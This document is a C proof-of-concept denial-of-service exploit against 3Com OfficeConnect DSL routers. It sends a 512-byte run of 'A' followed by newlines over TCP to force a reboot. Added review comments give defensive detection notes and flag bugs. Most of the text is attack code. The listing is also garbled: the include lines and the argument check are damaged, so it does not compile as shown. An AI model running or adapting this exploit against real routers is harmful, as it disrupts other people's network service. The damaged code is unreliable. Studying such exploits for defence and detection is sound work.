Exploit:
/* 3com-DoS.c
*
* PoC DoS exploit for 3Com OfficeConnect DSL Routers.
* discovered by David F. Madrid.
*
* Successful exploitation of the vulnerability should cause the router to
* reboot. It is not believed that arbitrary code execution is possible -
* check advisory for more information.
*
* -shaun2k2
*/
#include
#include
#include
#include
#include
#include
/*
 * main - resolve argv[1], open one TCP connection to the port given in
 * argv[2], send a single fixed buffer, wait two seconds and close.
 *
 * NOTE(review): this listing was damaged when the page was extracted.
 * The #include lines above have lost their header names, the argc test
 * below has lost its comparison and opening brace, and the banner and
 * usage strings have lost part of their bracketed text. As shown it does
 * not compile; the code is left exactly as found.
 *
 * What a defender can take from it: the payload is 512 bytes of 'A'
 * (0x41) followed by 8 LF bytes (0x0a), sent as the first and only data
 * on a fresh TCP connection, with no protocol framing around it. Per the
 * header comment the expected effect is a router reboot, so an unexpected
 * uptime reset on an affected device shortly after such a connection is
 * the event to correlate. The affected service is not named on this page
 * (the port is caller-supplied); the advisory the header refers to is the
 * place to confirm affected firmware and the vendor fix, and the router's
 * management services should not be reachable from untrusted networks.
 *
 * Returns 0 after the send. Exits with -1 on the usage path and when name
 * resolution, socket() or connect() fails.
 */
int main(int argc, char *argv[]) {
/* NOTE(review): garbled line - the argument-count comparison and the
 * opening brace of this if are missing. Presumably it required both a
 * host and a port, since argv[1] and argv[2] are read below - confirm
 * against an intact copy. */
if(argc printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - shaunige@yahoo.co.uk>\n\n");
printf("Usage: 3comDoS \n");
exit(-1);
}
int sock;
/* 521 bytes: 512 filler bytes + 8 newlines + one trailing byte that the
 * code below never writes. */
char explbuf[521];
/* dest is not zeroed; only sin_addr, sin_port and sin_family are set. */
struct sockaddr_in dest;
struct hostent *he;
/* Name or dotted-quad lookup; NULL means the host could not be resolved. */
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - shaunige@yahoo.co.uk>\n\n");
/* Uses the first address returned by the resolver. */
dest.sin_addr = *((struct in_addr *)he->h_addr);
/* atoi() reports no errors: a non-numeric port argument becomes 0 and
 * out-of-range values are not rejected. */
dest.sin_port = htons(atoi(argv[2]));
dest.sin_family = AF_INET;
printf("[+] Crafting exploit buffer.\n");
/* Bytes 0..511 are 'A', bytes 512..519 are '\n'. Byte 520 stays
 * uninitialized: memcpy copies 8 bytes, not the literal's terminator. */
memset(explbuf, 'A', 512);
memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);
if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) ==
-1) {
perror("connect()");
exit(-1);
}
printf("[+] Connected...Sending exploit buffer!\n");
/* strlen() here depends on a NUL that was never stored in explbuf, so
 * the length passed to send() is indeterminate. Anyone deriving a
 * signature from this code should match on the 'A' run plus the newline
 * run rather than on an exact payload length. The return value of send()
 * is not checked, so the success message below is printed regardless. */
send(sock, explbuf, strlen(explbuf), 0);
/* Presumably gives the data time to leave before the socket is closed. */
sleep(2);
close(sock);
printf("\n[+] Exploit buffer sent!\n");
return(0);
}